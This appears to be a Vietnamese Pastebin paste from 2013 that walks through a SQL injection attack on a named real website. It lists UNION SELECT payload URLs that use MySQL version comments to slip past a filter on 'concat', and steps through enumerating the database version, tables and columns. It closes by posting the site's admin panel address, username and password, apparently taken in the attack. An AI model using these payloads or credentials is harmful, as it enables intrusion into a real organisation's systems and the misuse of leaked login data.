Advertisement
hqlan1928

khi khai thác bị "cắn" concat

Dec 16th, 2013
120
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.14 KB | None | 0 0
  1. Lưu ý: site này bị cắn query "concat" nhé.
  2. Victim: http://www.alatkesehatan.co.id
  3.  
  4. Ta tìm version:
  5. http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,2,3,4;&nm=doctor_equipment
  6. ra được số "2" thay version vào
  7. http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,@@version,3,4;&nm=doctor_equipment
  8. => 5.5.34-log
  9.  
  10. Get Table:
  11. http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000table_name,3,4 from /*!10000information_schema*/.tables where table_schema=database() limit 0,1;&nm=doctor_equipment
  12.  
  13. Ta tăng "Limit" lên dần dần để tìm từ khóa khả nghi
  14. => Limit 0,1 = tbl_config
  15. Theo thứ tự 1,1 rồi 2,1...
  16.  
  17. Get Column:
  18. http://www.alatkesehatan.co.id/products/category/?id=null /*!50000UNION SELECT*/ 1,/*!10000column_name,3,4 from /*!10000information_schema*/.columns where table_name=0x74626c5f75736572 limit 0,1;&nm=doctor_equipment
  19.  
  20. Khai thác y chang như get table nhé. Cứ tăng dần Limit.
  21. ----------------------------
  22. Link Admin: http://www.alatkesehatan.co.id/myadmin
  23. User ID: admin
  24. Password: A789000EE==
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement